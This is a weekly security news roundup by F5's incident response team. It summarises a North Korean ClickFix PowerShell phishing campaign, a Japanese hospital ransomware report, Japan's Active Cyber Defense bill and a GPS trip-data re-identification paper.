Exploit PowerShell, Ransomware Attack Report, Active Cyber Defense, Attack to GPS

Notable news for the week of Feb 9-15,  2025. This week, your editor is Koichi from F5 Security Incident Response Team. In this edition, I have security news about Exploit PowerShell, Ransomware Attack Report, Active Cyber Defense, Attack on GPS.

We at F5 SIRT invest a lot of time to understand the frequently changing behavior of bad actors. Bad actors are a threat to your business, your reputation, your livelihood. That’s why we take the security of your business seriously. When you’re under attack, we’ll work quickly to effectively mitigate attacks and vulnerabilities, and get you back up and running. So next time you are under security emergency, please contact F5 SIRT.

 

New Targeted Attack: Exploit PowerShell

Microsoft Threat Intelligence team has posted series of posts on the X.com that they have observed a new method targeted attack carried out by Kimsuky, a threat actor thought to be North Korea-linked, since January 2025.

The malicious attacker who uses this method first impersonates a South Korean government official and builds trust over time with the target person (who should be in South Korea). And they send a spear-phishing e-mail to the target with a PDF attachment. The target person will be persuaded to click a URL containing a list of steps to register their Windows system.

Once URL is clicked, it prompts to launch PowerShell as an administrator and copy/paste the displayed code snippet into the terminal, and it downloads a browser-based remote desktop tool that runs in the browser, and installs it with a certificate file with a hard-coded PIN from a remote server. This code allows the malicious attacker to take control of the target PC and exfiltrate sensitive information on it.

This targeted attack methodology uses the ClickFix method. And this method is observed in other threat campaigns. In December 2024, people connected to the Contagious Interview campaign are tricking users into copying and using a bad command on their Apple macOS systems through the Terminal app. Then, the bad attacker can access the camera and microphone through the web browser.

Source: North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack

 

Detailed Report of the Ransomware Attack

On May 19, 2024, a ransomware group broke into the information system of Okayama Psychiatric Medical Center in Okayama prefecture. This caused the electronic medical record (EMR) to be completely shut down. The Okayama Psychiatric Medical Center’s system vendor looked into the incident on the same day. The investigation showed that many servers and clients were attacked and ransomware locked storage. They attempted to recover the system, however, they could not due to loss of all mission-critical data. 

Furthermore, it was later discovered that up to 40,000 people’s personal information had been leaked. This ransomware attack was the reported 15th ransomware attack against a hospital in Japan. It took 90 days to recover the information system, including the EMR. Subsequently, an incident investigation was conducted by an external committee, and the report of the investigation, the  "Ransomware Incident Investigation Report" was published on February 13, 2025. The report is 62 pages long, and readers can learn about the incident and subsequent response, and lessons from them.

The report says that VPN devices were probably the first targets of the attack. It is possible that weak passwords or the same passwords as other devices were used. Additionally, system hardening measures such as software updates and/or detail logging setting may not have been taken. The day after the attack was found, the internet was shut off to stop it. The whole system was scanned by many Anti-Virus programs. In addition, password policies were tightened and remote desktop connections were locked out. 

The Okayama Psychiatric Medical Center has made this report public so that other hospitals or organizations can take preventive measures against ransomware attacks. And many cyber-security professionals will draw lessons from this report.

Source: Ransomware Incident Investigation Report (Japanese)

 

"Active Cyber Defense" Part 3

In a former TWIS articles, I wrote about the “Active Cyber Defense” that the Japanese government is trying to introduce, and there was progress.

The Japanese government worried that no one could do counter-cyber attacks in the event of a cyber attack under the current legal regime, so they have been preparing an “Active Cyber Defense” bill which aims at strengthening national cyber security capabilities.

The bill was supposed to be sent by the end of 2024. However, it was delayed and approved by the country’s main Liberal Democratic Party (LDP) in January. The cabinet finally approved the bill on February 7, and it was sent to the Diet. After deliberations in the House of Representatives and the House of Councilors, the bill is expected to be enacted. The bill aims to take more proactive measures against cyber attacks before they cause widespread damage.

The Japanese government’s urgency to pass this bill can be attributed to the recent surge in DOS attacks and the fact that 70% of email attacks are in Japanese. This is also supported by a warning in January from Japan's national police that Chinese state-backed threat actor MirrorFace has been committing wide-scale cyber espionage since 2019 to steal Japan's national security secrets.

However, even if the active cyber defense is enacted, there are still problems: while it is named as “Active”, it cannot actually be preempted and can only be activated after suffering an attack, and they do not have enough personnel to do it nation-wide.
Source: Japan Goes on Offense With New 'Active Cyber Defense' Bill

 

Another attack methodology to GPS

Modern vehicles, ships, and aircraft use Global Navigation Satellite System (GNSS) positioning. This lets anyone know their position at any time. GPS is the most used GNSS, and people call GNSS positioning GPS. Since GPS is also used for weapons, it is interfered with on the battlefield. Its effects go beyond the battlefield. GPS jamming and spoofing attacks have been observed around the Black Sea.

The most well-known GPS jamming attacks are jamming and spoofing attacks. However, on February 12, a paper was published on a new vulnerability in GPS systems. It is called the Trip Data to Trajectory-User Linking attack.

Privacy related to location data is often not addressed due to the priority placed on practicality. However, some can remove personal identifiers from GPS data to protect privacy. 

However, this paper argues that simply removing personal identifiers from GPS data does not preserve privacy. The Trip Data to Trajectory-User Linking attack is an attack that can get the user’s personal identifiers from the trip data. This attack removes personal identifiers. So only removing personal identifiers no longer safe.

The paper also argues that users who frequent places visited by only a few others tend to be more vulnerable to re-identification.

Source: Investigating Vulnerabilities of GPS Trip Data to Trajectory-User Linking Attacks